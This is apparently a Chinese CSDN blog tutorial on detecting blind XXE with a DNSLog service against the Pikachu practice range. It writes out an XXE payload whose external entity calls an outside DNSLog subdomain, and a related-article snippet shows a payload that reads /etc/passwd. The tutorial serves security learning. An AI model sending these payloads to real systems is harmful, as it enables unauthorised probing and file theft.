DNSLog漏洞探测(五)之XXE漏洞实战

最新推荐文章于 2024-05-30 14:41:17 发布
最新推荐文章于 2024-05-30 14:41:17 发布
阅读量453 收藏 4
点赞数 1
分类专栏: DNSLog漏洞探测 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/134948218
版权

DNSLog漏洞探测(五)之XXE漏洞实战

本文我们来学习如何利用DNSLog平台探测目标网站是否存在RCE漏洞,接下来我们还是利用Pikachu的靶场作为演示。首先我们先进入Pikachu靶场的XXE漏洞界面。

在这里插入图片描述

如果此时网站的界面存在着无回显的XXE漏洞,这种情况下,我们该如何使用DNSLog平台去探测该漏洞是否存在呢?

首先,我们先打开DNSLog服务平台,点击 Get SubDomain 获取一个子域名,这里我们获取到的子域名是 adswfw.dnslog.cn

在这里插入图片描述

接下来我们只需要提交以下的payload,将其中的XXXXX部分替换为我们从DNSLog服务平台获取到的子域名就好了

#原始的payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://xxxxxx.dnslog.cn">%remote;]>
#本文利用的payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://adswfw.dnslog.cn">%remote;]>

点击提交

在这里插入图片描述

提交后的界面

在这里插入图片描述

现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XXE漏洞

在这里插入图片描述

怰月
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
owasp top10之XXE漏洞
赤赤三的博客
03-21 732
XXE漏洞 XML: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 XXE( XML External Entity 外部实体注入,只能读服务器文件,但是执行不了系统命令): XXE(XML外部实体注入,XML External Entity) ,在应用程序解析XML输入时,当允许引用外部实体时,可构造恶意内容,导致读取任意文件、探测内网...
WEB安全XXE实体注入漏洞.pdf
12-12
WEB安全XXE实体注入漏洞
网络安全web漏洞-xml外部实体注入(XXE)
ZL_1618的博客
01-08 944
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
DNSLog漏洞探测(七)之SQL注入漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-14 667
在前面的文章之中,我们已经学习了XSS、RCE、XXE、SSRF漏洞中有关于DNSLog平台的使用。这些漏洞本身在执行时就有解析URL地址,发起网络请求的操作,所以只要我们把DNSLog平台获取的子域名地址发送到存在漏洞的服务器上,就会产生DNSLog的解析记录,这样就可以证明该漏洞的存在。
DNSLog漏洞探测(三)之XSS漏洞实战
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-12 929
DNSLog的平台实际使用很长见的一种情况就是针对漏洞无回显的情况,我们通过让受害者的服务器主动发起对DNSLog服务平台的请求去外带一些信息,但更多的使用场景是我们仅仅使用DNSLog去作为探测漏洞是否存在的一种手段。现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XSS漏洞。通过前面的学习,我们已经明白了什么是DNSLog平台,那么DNSLog平台到底能为我们做些什么呢?
浅析DNSlog在渗透测试中的实战技巧
热门推荐
道阻且长,行则将至。
05-23 1万+
文章目录前言SSRF 盲打XSS的盲打XXE的盲打SQL的盲注RCE的盲打总结 前言 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把想获得的数据外带出来。 DNS 的全称是 Domain Name System(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如 www.baidu.com,网络上的 DNS Server 会将该域名解析,并找到对应的真实 IP 如 127.0.0.1,使用户可以访问这台服务器上相
xxe漏洞利用
weixin_43774222的博客
03-11 4090
xxe phpstudy 版本为5.4.45,高版本可以会报错 有回显xxe 点击any bugs,使用burp抓包 burp抓到的数据包如下(响应报错原因为php版本过高) 文件读取 修改xml内容,调用实体test,读取本地passwd文件 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE copyright [ <!ENTITY test SYSTEM "file:///g://etc/passwd"> ]> &l
xxe漏洞专题
goddemon
12-19 948
XML基础 xml作用:用于标记用户的数据与标记数据类型 定义以及基本结构 两种声明方法 **内部声明DTD** <!DOCTYPE 根元素 [元素声明]> **引用外部DTD** <!DOCTYPE 根元素 SYSTEM "文件名"> #实例 <?xml version="1.0"?> <!DOCTYPE note[ <!--定义此文档是 note 类型的文档-->
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6349
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
JAVA代码审计之深入XXE漏洞挖掘与防御
道阻且长,行则将至。
12-16 471
原先学习和介绍过 XXE 漏洞的基础知识,但是这对于实战中挖掘此类漏洞还是远远不够的。本文将通过 WebGoat 靶场深入学习 XXE 漏洞利用,并聚焦如何在 Java 源码审计过程中发现 XXE 漏洞,以及从研发人员视角该如何规避此类漏洞
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML解
XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE漏洞利用 - 任意文件读取 无回显 -01
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 1125
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
云端数据提取:安全、高效地利用无限资源
最新发布
Shaidou_Data的博客
05-30 622
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
ModStartBlog v9.4.0 后台安全升级,已知问题修复
qq_26450889的博客
05-29 961
ModStart 是一个基于 Laravel 模块化极速开发框架。模块市场拥有丰富的功能应用,支持后台一键快速安装,让开发者能快的实现业务功能开发。系统完全开源,基于 Apache 2.0 开源协议。
助力矿山智能化建设,中海达推出全新安全管控方案
Hi_Target的博客
05-30 703
针对露天矿边坡、尾矿库、采空区地表沉降等问题,采用北斗高精度定位、地基InSAR、激光雷达等技术,实现大范围全覆盖、多源数据融合、自动化监测、实时预警。采用北斗、UWB/蓝牙、音视频、5G等技术,实现露天矿人员、车辆的全方位实时监控、电子围栏告警、指挥调度,提升矿山安全生产管理水平。2008年进入矿山安全监测领域,至今已有十六年的研发、交付和运维经验,实施案例遍布内蒙古、新疆、西藏、云南、广东、福建等多个省市自治区。涉及井上井下,道路分布复杂、人员车辆密集、车辆载重大,易发生地质灾害和人员安全事故。
pikachu xxe漏洞
09-04
pikachu是一个漏洞练习环境,其中包含了xxe漏洞xxe漏洞(XML External Entity)是一种利用XML解析器的漏洞。当应用程序解析恶意构造的XML文件时,攻击者可以通过xxe漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。在pikachu靶场中,你可以通过xxe模块来实战演示xxe漏洞的利用方法和思路。详细的安装和使用指南可以在pikachu的GitHub页面找到。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [pikachu漏洞练习环境](https://download.csdn.net/download/liguangyao213/11922413)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [XXE(XML外部实体注入)漏洞分析——pikachu靶场复现](https://blog.csdn.net/qq_45612828/article/details/126116429)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值